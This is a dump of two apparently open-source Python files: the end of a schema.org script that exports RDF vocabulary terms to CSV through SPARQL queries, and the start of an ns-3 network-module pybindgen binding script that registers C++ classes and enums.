FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/").
%s
}
ORDER BY ?term''') % atticfilter
props = list(self.queryGraph.query(query))
self.prop2CSV(header=True,out=file)
for t in props:
self.prop2CSV(term=t.term,header=False,out=file,graph=self.queryGraph)
def prop2CSV(self,term=None,header=True,out=None,graph=None):
cols = ["id","label","comment","subPropertyOf","equivalentProperty","subproperties","domainIncludes","rangeIncludes","inverseOf","supersedes","supersededBy","isPartOf"]
if not out:
return
writer = csv.writer(out,quoting=csv.QUOTE_ALL,lineterminator='\n')
if header:
writer.writerow(cols)
return
if not graph:
graph = self.queryGraph
if term == None or graph == None:
return
row = [str(term)]
row.append(self.graphValueToCSV(subject=term,predicate=RDFS.label,graph=graph))
row.append(self.getCSVComment(term,graph=self.fullGraph))
row.append(self.getCSVSuperProperties(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=OWL.equivalentProperty,graph=graph))
row.append(self.getCSVSubProperties(term,graph=self.fullGraph))
row.append(self.getCSVDomainIncludes(term,graph=self.fullGraph))
row.append(self.getCSVRangeIncludes(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=URIRef("http://schema.org/inverseOf"),graph=graph))
row.append(self.getCSVsuperseds(term,graph=self.fullGraph))
row.append(self.getCSVSupersededBy(term,graph=self.fullGraph))
row=[s.encode('utf-8') for s in row]
writer.writerow(row)
#print term
def type2CSV(self,term=None,header=True,out=None,graph=None):
cols = ["id","label","comment","subTypeOf","enumerationtype","equivalentClass","properties","subTypes","supersedes","supersededBy","isPartOf"]
if not out:
return
writer = csv.writer(out,quoting=csv.QUOTE_ALL,lineterminator='\n')
if header:
writer.writerow(cols)
return
if not graph:
graph = self.queryGraph
if term == None or graph == None:
return
if not isinstance(term, URIRef):
term = URIRef(term)
enumType = self.graphValueToCSV(subject=term,predicate=RDF.type,graph=graph)
if enumType.endswith("#Class"):
enumType = ""
row = [str(term)]
row.append(self.graphValueToCSV(subject=term,predicate=RDFS.label,graph=graph))
row.append(self.getCSVComment(term,graph=self.fullGraph))
row.append(self.getCSVSupertypes(term,graph=self.fullGraph))
row.append(enumType)
row.append(self.graphValueToCSV(subject=term,predicate=OWL.equivalentClass,graph=graph))
row.append(self.getCSVTypeProperties(term,graph=self.fullGraph))
row.append(self.getCSVSubtypes(term,graph=self.fullGraph))
row.append(self.getCSVsuperseds(term,graph=self.fullGraph))
row.append(self.getCSVSupersededBy(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=URIRef("http://schema.org/isPartOf"),graph=graph))
row=[s.encode('utf-8') for s in row]
writer.writerow(row)
def graphValueToCSV(self, subject=None, predicate= None, object= None, graph=None):
ret = ""
try:
RDFLIBLOCK.acquire()
ret = str(graph.value(subject=subject,predicate=predicate,object=object))
finally:
RDFLIBLOCK.release()
if ret == None or ret == "None":
ret = ""
return ret
def getCSVSupertypes(self,term=None,graph=None):
query='''select ?sup where{
<%s> rdfs:subClassOf ?sup.
BIND(STR(?sup) AS ?strVal)
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/")
}
ORDER BY ?sup''' % term
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
return ret
def getCSVTypeProperties(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?prop schema:isPartOf <http://attic.schema.org>.}"
query='''select DISTINCT ?prop where{
?term (^rdfs:subClassOf*) <%s>.
?prop <http://schema.org/domainIncludes> ?term.
%s
}
ORDER BY ?prop''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.prop for x in res])
return ret
def getCSVSubtypes(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sub schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sub where{
?sub rdfs:subClassOf <%s>.
%s
}
ORDER BY ?sub''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sub for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
return ret
def getCSVSupersededBy(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sub schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sup where{
<%s> schema:supersededBy ?sup.
%s
}
ORDER BY ?sup''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
#print "%s supercededBy: '%s'" % (term,ret)
return ret
def getCSVsuperseds(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sup schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sup where{
?sup schema:supersededBy <%s>.
%s
}
ORDER BY ?sup''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
#print "%s superseds: '%s'" % (term,ret)
return ret
def getCSVSuperProperties(self,term=None,graph=None):
query='''select ?sup where{
<%s> rdfs:subPropertyOf ?sup.
BIND(STR(?sup) AS ?strVal)
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/")
}
ORDER BY ?sup''' % term
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
#print "%s subtypeof: '%s'" % (term,ret)
return ret
def getCSVSubProperties(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sub schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sub where{
?sub rdfs:subPropertyOf <%s>.
%s
}
ORDER BY ?sub''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sub for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
return ret
def getCSVDomainIncludes(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?type schema:isPartOf <http://attic.schema.org>.}"
query='''select ?type where{
<%s> <http://schema.org/domainIncludes> ?type.
%s
}
ORDER BY ?type''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.type for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
return ret
def getCSVRangeIncludes(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?type schema:isPartOf <http://attic.schema.org>.}"
query='''select ?type where{
<%s> <http://schema.org/rangeIncludes> ?type.
%s
}
ORDER BY ?type''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.type for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
return ret
def getCSVComment(self,term=None,graph=None):
query='''select ?com where{
<%s> rdfs:comment ?com.
}''' % term
res = self.doQuery(graph,query)
ret = ', '.join([x.com for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
if self.markdown:
Markdown.setPre("http://schema.org/")
ret = Markdown.parse(ret)
Markdown.setPre()
return ret
|
unor/schemaorg
|
sdordf2csv.py
|
Python
|
apache-2.0
| 11,152 | 0.017755 |
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.network', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## packetbb.h (module 'network'): ns3::PbbAddressLength [enumeration]
module.add_enum('PbbAddressLength', ['IPV4', 'IPV6'])
## ethernet-header.h (module 'network'): ns3::ethernet_header_t [enumeration]
module.add_enum('ethernet_header_t', ['LENGTH', 'VLAN', 'QINQ'])
## address.h (module 'network'): ns3::Address [class]
module.add_class('Address')
## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration]
module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'])
## application-container.h (module 'network'): ns3::ApplicationContainer [class]
module.add_class('ApplicationContainer')
## trace-helper.h (module 'network'): ns3::AsciiTraceHelper [class]
module.add_class('AsciiTraceHelper')
## trace-helper.h (module 'network'): ns3::AsciiTraceHelperForDevice [class]
module.add_class('AsciiTraceHelperForDevice', allow_subclassing=True)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
module.add_class('AttributeConstructionList', import_from_module='ns.core')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
## buffer.h (module 'network'): ns3::Buffer [class]
module.add_class('Buffer')
## buffer.h (module 'network'): ns3::Buffer::Iterator [class]
module.add_class('Iterator', outer_class=root_module['ns3::Buffer'])
## packet.h (module 'network'): ns3::ByteTagIterator [class]
module.add_class('ByteTagIterator')
## packet.h (module 'network'): ns3::ByteTagIterator::Item [class]
module.add_class('Item', outer_class=root_module['ns3::ByteTagIterator'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList [class]
module.add_class('ByteTagList')
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator [class]
module.add_class('Iterator', outer_class=root_module['ns3::ByteTagList'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item [struct]
module.add_class('Item', outer_class=root_module['ns3::ByteTagList::Iterator'])
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## channel-list.h (module 'network'): ns3::ChannelList [class]
module.add_class('ChannelList')
## data-rate.h (module 'network'): ns3::DataRate [class]
module.add_class('DataRate')
## event-id.h (module 'core'): ns3::EventId [class]
module.add_class('EventId', import_from_module='ns.core')
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class]
module.add_class('Inet6SocketAddress')
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class]
root_module['ns3::Inet6SocketAddress'].implicitly_converts_to(root_module['ns3::Address'])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class]
module.add_class('InetSocketAddress')
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class]
root_module['ns3::InetSocketAddress'].implicitly_converts_to(root_module['ns3::Address'])
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
module.add_class('Ipv4Address')
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class]
module.add_class('Ipv4Mask')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
module.add_class('Ipv6Address')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class]
module.add_class('Ipv6Prefix')
## mac48-address.h (module 'network'): ns3::Mac48Address [class]
module.add_class('Mac48Address')
## mac48-address.h (module 'network'): ns3::Mac48Address [class]
root_module['ns3::Mac48Address'].implicitly_converts_to(root_module['ns3::Address'])
## mac64-address.h (module 'network'): ns3::Mac64Address [class]
module.add_class('Mac64Address')
## mac64-address.h (module 'network'): ns3::Mac64Address [class]
root_module['ns3::Mac64Address'].implicitly_converts_to(root_module['ns3::Address'])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer [class]
module.add_class('NetDeviceContainer')
## node-container.h (module 'network'): ns3::NodeContainer [class]
module.add_class('NodeContainer')
## node-list.h (module 'network'): ns3::NodeList [class]
module.add_class('NodeList')
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## object.h (module 'core'): ns3::ObjectDeleter [struct]
module.add_class('ObjectDeleter', import_from_module='ns.core')
## object-factory.h (module 'core'): ns3::ObjectFactory [class]
module.add_class('ObjectFactory', import_from_module='ns.core')
## packet-metadata.h (module 'network'): ns3::PacketMetadata [class]
module.add_class('PacketMetadata')
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [struct]
module.add_class('Item', outer_class=root_module['ns3::PacketMetadata'])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [enumeration]
module.add_enum('', ['PAYLOAD', 'HEADER', 'TRAILER'], outer_class=root_module['ns3::PacketMetadata::Item'])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator [class]
module.add_class('ItemIterator', outer_class=root_module['ns3::PacketMetadata'])
## packet-socket-address.h (module 'network'): ns3::PacketSocketAddress [class]
module.add_class('PacketSocketAddress')
## packet-socket-address.h (module 'network'): ns3::PacketSocketAddress [class]
root_module['ns3::PacketSocketAddress'].implicitly_converts_to(root_module['ns3::Address'])
## packet-socket-helper.h (module 'network'): ns3::PacketSocketHelper [class]
module.add_class('PacketSocketHelper')
## packet.h (module 'network'): ns3::PacketTagIterator [class]
module.add_class('PacketTagIterator')
## packet.h (module 'network'): ns3::PacketTagIterator::Item [class]
module.add_class('Item', outer_class=root_module['ns3::PacketTagIterator'])
## packet-tag-list.h (module 'network'): ns3::PacketTagList [class]
module.add_class('PacketTagList')
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData [struct]
module.add_class('TagData', outer_class=root_module['ns3::PacketTagList'])
## packetbb.h (module 'network'): ns3::PbbAddressTlvBlock [class]
module.add_class('PbbAddressTlvBlock')
## packetbb.h (module 'network'): ns3::PbbTlvBlock [class]
module.add_class('PbbTlvBlock')
## pcap-file.h (module 'network'): ns3::PcapFile [class]
module.add_class('PcapFile')
## trace-helper.h (module 'network'): ns3::PcapHelper [class]
module.add_class('PcapHelper')
## trace-helper.h (module 'network'): ns3::PcapHelper [enumeration]
module.add_enum('', ['DLT_NULL', 'DLT_EN10MB', 'DLT_PPP', 'DLT_RAW', 'DLT_IEEE802_11', 'DLT_PRISM_HEADER', 'DLT_IEEE802_11_RADIO'], outer_class=root_module['ns3::PcapHelper'])
## trace-helper.h (module 'network'): ns3::PcapHelperForDevice [class]
module.add_class('PcapHelperForDevice', allow_subclassing=True)
## random-variable.h (module 'core'): ns3::RandomVariable [class]
module.add_class('RandomVariable', import_from_module='ns.core')
## rng-seed-manager.h (module 'core'): ns3::RngSeedManager [class]
module.add_class('RngSeedManager', import_from_module='ns.core')
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned int, int> [class]
module.add_class('SequenceNumber32')
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned short, short> [class]
module.add_class('SequenceNumber16')
## random-variable.h (module 'core'): ns3::SequentialVariable [class]
module.add_class('SequentialVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simulator.h (module 'core'): ns3::Simulator [class]
module.add_class('Simulator', destructor_visibility='private', import_from_module='ns.core')
## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs [class]
module.add_class('SystemWallClockMs', import_from_module='ns.core')
## tag.h (module 'network'): ns3::Tag [class]
module.add_class('Tag', parent=root_module['ns3::ObjectBase'])
## tag-buffer.h (module 'network'): ns3::TagBuffer [class]
module.add_class('TagBuffer')
## random-variable.h (module 'core'): ns3::TriangularVariable [class]
module.add_class('TriangularVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## random-variable.h (module 'core'): ns3::UniformVariable [class]
module.add_class('UniformVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::WeibullVariable [class]
module.add_class('WeibullVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ZetaVariable [class]
module.add_class('ZetaVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ZipfVariable [class]
module.add_class('ZipfVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## int64x64-double.h (module 'core'): ns3::int64x64_t [class]
module.add_class('int64x64_t', import_from_module='ns.core')
## chunk.h (module 'network'): ns3::Chunk [class]
module.add_class('Chunk', parent=root_module['ns3::ObjectBase'])
## random-variable.h (module 'core'): ns3::ConstantVariable [class]
module.add_class('ConstantVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::DeterministicVariable [class]
module.add_class('DeterministicVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::EmpiricalVariable [class]
module.add_class('EmpiricalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ErlangVariable [class]
module.add_class('ErlangVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ExponentialVariable [class]
module.add_class('ExponentialVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## flow-id-tag.h (module 'network'): ns3::FlowIdTag [class]
module.add_class('FlowIdTag', parent=root_module['ns3::Tag'])
## random-variable.h (module 'core'): ns3::GammaVariable [class]
module.add_class('GammaVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## header.h (module 'network'): ns3::Header [class]
module.add_class('Header', parent=root_module['ns3::Chunk'])
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable [class]
module.add_class('IntEmpiricalVariable', import_from_module='ns.core', parent=root_module['ns3::EmpiricalVariable'])
## llc-snap-header.h (module 'network'): ns3::LlcSnapHeader [class]
module.add_class('LlcSnapHeader', parent=root_module['ns3::Header'])
## random-variable.h (module 'core'): ns3::LogNormalVariable [class]
module.add_class('LogNormalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::NormalVariable [class]
module.add_class('NormalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## object.h (module 'core'): ns3::Object [class]
module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
## object.h (module 'core'): ns3::Object::AggregateIterator [class]
module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
## packet-burst.h (module 'network'): ns3::PacketBurst [class]
module.add_class('PacketBurst', parent=root_module['ns3::Object'])
## random-variable.h (module 'core'): ns3::ParetoVariable [class]
module.add_class('ParetoVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## pcap-file-wrapper.h (module 'network'): ns3::PcapFileWrapper [class]
module.add_class('PcapFileWrapper', parent=root_module['ns3::Object'])
## queue.h (module 'network'): ns3::Queue [class]
module.add_class('Queue', parent=root_module['ns3::Object'])
## queue.h (module 'network'): ns3::Queue::QueueMode [enumeration]
module.add_enum('QueueMode', ['QUEUE_MODE_PACKETS', 'QUEUE_MODE_BYTES'], outer_class=root_module['ns3::Queue'])
## radiotap-header.h (module 'network'): ns3::RadiotapHeader [class]
module.add_class('RadiotapHeader', parent=root_module['ns3::Header'])
## radiotap-header.h (module 'network'): ns3::RadiotapHeader [enumeration]
module.add_enum('', ['FRAME_FLAG_NONE', 'FRAME_FLAG_CFP', 'FRAME_FLAG_SHORT_PREAMBLE', 'FRAME_FLAG_WEP', 'FRAME_FLAG_FRAGMENTED', 'FRAME_FLAG_FCS_INCLUDED', 'FRAME_FLAG_DATA_PADDING', 'FRAME_FLAG_BAD_FCS', 'FRAME_FLAG_SHORT_GUARD'], outer_class=root_module['ns3::RadiotapHeader'])
## radiotap-header.h (module 'network'): ns3::RadiotapHeader [enumeration]
module.add_enum('', ['CHANNEL_FLAG_NONE', 'CHANNEL_FLAG_TURBO', 'CHANNEL_FLAG_CCK', 'CHANNEL_FLAG_OFDM', 'CHANNEL_FLAG_SPECTRUM_2GHZ', 'CHANNEL_FLAG_SPECTRUM_5GHZ', 'CHANNEL_FLAG_PASSIVE', 'CHANNEL_FLAG_DYNAMIC', 'CHANNEL_FLAG_GFSK'], outer_class=root_module['ns3::RadiotapHeader'])
## red-queue.h (module 'network'): ns3::RedQueue [class]
module.add_class('RedQueue', parent=root_module['ns3::Queue'])
## red-queue.h (module 'network'): ns3::RedQueue [enumeration]
module.add_enum('', ['DTYPE_NONE', 'DTYPE_FORCED', 'DTYPE_UNFORCED'], outer_class=root_module['ns3::RedQueue'])
## red-queue.h (module 'network'): ns3::RedQueue::Stats [struct]
module.add_class('Stats', outer_class=root_module['ns3::RedQueue'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::EventImpl', 'ns3::empty', 'ns3::DefaultDeleter<ns3::EventImpl>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::NixVector', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NixVector>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::OutputStreamWrapper', 'ns3::empty', 'ns3::DefaultDeleter<ns3::OutputStreamWrapper>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::Packet', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Packet>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::PbbAddressBlock', 'ns3::empty', 'ns3::DefaultDeleter<ns3::PbbAddressBlock>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::PbbMessage', 'ns3::empty', 'ns3::DefaultDeleter<ns3::PbbMessage>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::PbbPacket', 'ns3::Header', 'ns3::DefaultDeleter<ns3::PbbPacket>'], parent=root_module['ns3::Header'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::PbbTlv', 'ns3::empty', 'ns3::DefaultDeleter<ns3::PbbTlv>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## socket.h (module 'network'): ns3::Socket [class]
module.add_class('Socket', parent=root_module['ns3::Object'])
## socket.h (module 'network'): ns3::Socket::SocketErrno [enumeration]
module.add_enum('SocketErrno', ['ERROR_NOTERROR', 'ERROR_ISCONN', 'ERROR_NOTCONN', 'ERROR_MSGSIZE', 'ERROR_AGAIN', 'ERROR_SHUTDOWN', 'ERROR_OPNOTSUPP', 'ERROR_AFNOSUPPORT', 'ERROR_INVAL', 'ERROR_BADF', 'ERROR_NOROUTETOHOST', 'ERROR_NODEV', 'ERROR_ADDRNOTAVAIL', 'ERROR_ADDRINUSE', 'SOCKET_ERRNO_LAST'], outer_class=root_module['ns3::Socket'])
## socket.h (module 'network'): ns3::Socket::SocketType [enumeration]
module.add_enum('SocketType', ['NS3_SOCK_STREAM', 'NS3_SOCK_SEQPACKET', 'NS3_SOCK_DGRAM', 'NS3_SOCK_RAW'], outer_class=root_module['ns3::Socket'])
## socket.h (module 'network'): ns3::SocketAddressTag [class]
module.add_class('SocketAddressTag', parent=root_module['ns3::Tag'])
## socket-factory.h (module 'network'): ns3::SocketFactory [class]
module.add_class('SocketFactory', parent=root_module['ns3::Object'])
## socket.h (module 'network'): ns3::SocketIpTtlTag [class]
module.add_class('SocketIpTtlTag', parent=root_module['ns3::Tag'])
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag [class]
module.add_class('SocketSetDontFragmentTag', parent=root_module['ns3::Tag'])
## nstime.h (module 'core'): ns3::Time [class]
module.add_class('Time', import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time::Unit [enumeration]
module.add_enum('Unit', ['S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time [class]
